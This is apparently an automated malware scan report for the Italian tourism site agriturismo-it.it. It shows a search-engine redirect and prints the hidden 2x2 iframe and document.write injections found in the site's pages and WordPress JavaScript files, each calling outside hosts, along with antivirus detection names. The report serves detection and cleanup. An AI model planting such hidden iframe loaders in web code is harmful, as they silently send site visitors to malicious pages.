New scan:

Malware Scanner report for agriturismo-it.it

Malicious/Suspicious/Total urls checked
4/0/15
4 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://reddeerhotyoga.ca/auyd.html?h=1597952
204 websites infected.

The website "agriturismo-it.it" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/22/22
22 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://www.agriturismo-it.it/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: www.agriturismo-it.it
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Connection: close
Date: Sun, 25 Oct 2015 06:03:26 GMT
Location: http://reddeerhotyoga.ca/auyd.html?h=1597952
Server: nginx/1.8.0
Content-Length: 299
Content-Type: text/html; charset=iso-8859-1
malicious

Scanned pages/files

RequestServer responseStatus
http://www.agriturismo-it.it/
200 OK
Content-Length: 17478
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://reddeerhotyoga.ca/auyd.html?i=1597952

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?i=1597952>

http://www.agriturismo-it.it/wp-content/themes/agriturismo/script.js
200 OK
Content-Length: 11075
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?j=1597952></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://snmsc.org/ouyd.html?j=1597952></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/antd.ht
... 3473 bytes are skipped ...
ve')) wrapper.className += " active";
});
artEventHelper.bind(button, 'mouseup', function(e) {
e = e || window.event;
button = e.target || e.srcElement;
wrapper = button.parentNode;
if (!artHasClass(button, 'active')) wrapper.className = wrapper.className.replace(/active/, "");
});
}
}
}
artLoadEvent.add(function() { artButtonsSetupJsHover("button"); });
artLoadEvent.add(function() { artButtonsSetupJsHover("button"); });

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://signatureseriesguitar.com/antd.html?j=1597952

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/antd.html?j=1597952>

Hidden iFrame found.
size: 2x2     
src: http://reddeerhotyoga.ca/auyd.html?j=1597952

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?j=1597952>

Hidden iFrame found.
size: 2x2     
src: http://snmsc.org/ouyd.html?j=1597952

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://snmsc.org/ouyd.html?j=1597952>

http://www.agriturismo-it.it/wp-includes/js/jquery/jquery.js?ver=1.3.2
200 OK
Content-Length: 57761
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?j=1597952></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://snmsc.org/ouyd.html?j=1597952></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/antd.ht
... 3158 bytes are skipped ...
K?"margin":"border"):null};var J=G.toLowerCase();o.fn[J]=function(K){return this[0]==l?document.compatMode=="CSS1Compat"&&document.documentElement["client"+G]||document.body["client"+G]:this[0]==document?Math.max(document.documentElement["client"+G],document.body["scroll"+G],document.documentElement["scroll"+G],document.body["offset"+G],document.documentElement["offset"+G]):K===g?(this.length?o.css(this[0],J):null):this.css(J,typeof K==="string"?K:K+"px")}})})();
jQuery.noConflict();

Antivirus reports:

Qihoo-360
Trojan.Generic
AntiVir
HTML/TwitScroll.B
Avast
HTML:Iframe-BNK [Trj]
Ad-Aware
Trojan.Iframe.CEG
Bkav
MW.Clod63c.Trojan.4cd4
Ikarus
Exploit.HTML.IframeRef
nProtect
Trojan.Iframe.CEG
TrendMicro-HouseCall
TROJ_GEN.F47V1121
Emsisoft
JS:Trojan.Clicker.NBP (B)
Comodo
TrojWare.JS.Iframe.FK
McAfee-GW-Edition
JS/IFrame.gen.j
DrWeb
JS.IFrame.473
Microsoft
Exploit:HTML/IframeRef.DM
Kaspersky
HEUR:Trojan.Script.Generic
MicroWorld-eScan
Trojan.Iframe.CEG
Fortinet
JS/Iframe.HH!tr
McAfee
JS/IFrame.gen.j
NANO-Antivirus
Trojan.Html.TwitScroll.bklyhq
F-Secure
Trojan.Iframe.CEG
VIPRE
Malware.JS.Generic (JS)
F-Prot
IFrame.gen
AVG
HTML/Framer
Norman
Iframe.YR
Sophos
Troj/Iframe-JG
GData
Trojan.Iframe.CEG
Symantec
Trojan.Maliframe!html
Commtouch
IFrame.gen
ESET-NOD32
JS/Iframe.JE
BitDefender
Trojan.Iframe.CEG

Hidden iFrame found.
size: 2x2     
src: http://signatureseriesguitar.com/antd.html?j=1597952

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/antd.html?j=1597952>

Hidden iFrame found.
size: 2x2     
src: http://reddeerhotyoga.ca/auyd.html?j=1597952

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?j=1597952>

Hidden iFrame found.
size: 2x2     
src: http://snmsc.org/ouyd.html?j=1597952

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://snmsc.org/ouyd.html?j=1597952>

http://www.agriturismo-it.it/wp-includes/js/jquery/jquery.form.js?ver=2.02m
200 OK
Content-Length: 8915
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?j=1597952></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://snmsc.org/ouyd.html?j=1597952></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/antd.ht
... 3178 bytes are skipped ...
eset.nodeType)){this.reset()}})};$.fn.enable=function(b){if(b==undefined){b=true}return this.each(function(){this.disabled=!b})};$.fn.select=function(select){if(select==undefined){select=true}return this.each(function(){var t=this.type;if(t=="checkbox"||t=="radio"){this.checked=select}else{if(this.tagName.toLowerCase()=="option"){var $sel=$(this).parent("select");if(select&&$sel[0]&&$sel[0].type=="select-one"){$sel.find("option").select(false)}this.selected=select}}})}})(jQuery);

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://signatureseriesguitar.com/antd.html?j=1597952

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/antd.html?j=1597952>

Hidden iFrame found.
size: 2x2     
src: http://snmsc.org/ouyd.html?j=1597952

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://snmsc.org/ouyd.html?j=1597952>

Hidden iFrame found.
size: 2x2     
src: http://reddeerhotyoga.ca/auyd.html?j=1597952

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?j=1597952>

http://www.agriturismo-it.it/wp-content/plugins/contact-form-7/scripts.js?ver=2.1.1
200 OK
Content-Length: 4928
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?j=1597952></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://snmsc.org/ouyd.html?j=1597952></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/antd.ht
... 4479 bytes are skipped ...
(':input[name="' + i + '"]').siblings('span.wpcf7-quiz-label').text(n[0]);
jQuery(form).find('input:hidden[name="_wpcf7_quiz_answer_' + i + '"]').attr('value', n[1]);
});
}
function wpcf7ClearResponseOutput() {
jQuery('div.wpcf7-response-output').hide().empty().removeClass('wpcf7-mail-sent-ok wpcf7-mail-sent-ng wpcf7-validation-errors wpcf7-spam-blocked');
jQuery('span.wpcf7-not-valid-tip').remove();
jQuery('img.ajax-loader').css({ visibility: 'hidden' });
}

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://signatureseriesguitar.com/antd.html?j=1597952

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/antd.html?j=1597952>

Hidden iFrame found.
size: 2x2     
src: http://snmsc.org/ouyd.html?j=1597952

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://snmsc.org/ouyd.html?j=1597952>

Hidden iFrame found.
size: 2x2     
src: http://reddeerhotyoga.ca/auyd.html?j=1597952

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?j=1597952>

http://www.agriturismo-it.it/bed-and-breakfast.html
200 OK
Content-Length: 7597
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://reddeerhotyoga.ca/auyd.html?i=1597952

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?i=1597952>

http://www.agriturismo-it.it/hotel.html
200 OK
Content-Length: 7596
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://reddeerhotyoga.ca/auyd.html?i=1597952

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?i=1597952>

http://www.agriturismo-it.it/ristoranti.html
200 OK
Content-Length: 7816
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://reddeerhotyoga.ca/auyd.html?i=1597952

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?i=1597952>

http://www.agriturismo-it.it/inserimento-online.html
200 OK
Content-Length: 21588
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://reddeerhotyoga.ca/auyd.html?i=1597952

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?i=1597952>

http://www.agriturismo-it.it/wp-content/uploads/2010/02/struttura-turistica-online1.jpg
200 OK
Content-Length: 24262
Content-Type: image/jpeg
clean
http://www.agriturismo-it.it/test404page.js
404 Not Found
Content-Length: 9806
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://reddeerhotyoga.ca/auyd.html?i=1597952

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?i=1597952>

http://www.agriturismo-it.it/agriturismo_abruzzo.html
200 OK
Content-Length: 13489
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://reddeerhotyoga.ca/auyd.html?i=1597952

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?i=1597952>

http://www.agriturismo-it.it/agriturismo_basilicata.html
200 OK
Content-Length: 12519
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://reddeerhotyoga.ca/auyd.html?i=1597952

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?i=1597952>

http://www.agriturismo-it.it/agriturismo_calabria.html
200 OK
Content-Length: 12668
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://reddeerhotyoga.ca/auyd.html?i=1597952

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?i=1597952>

http://www.agriturismo-it.it/agriturismo_campania.html
200 OK
Content-Length: 14614
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://reddeerhotyoga.ca/auyd.html?i=1597952

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?i=1597952>

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=agriturismo-it.it

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://agriturismo-it.it/

Result: agriturismo-it.it is not infected or malware details are not published yet.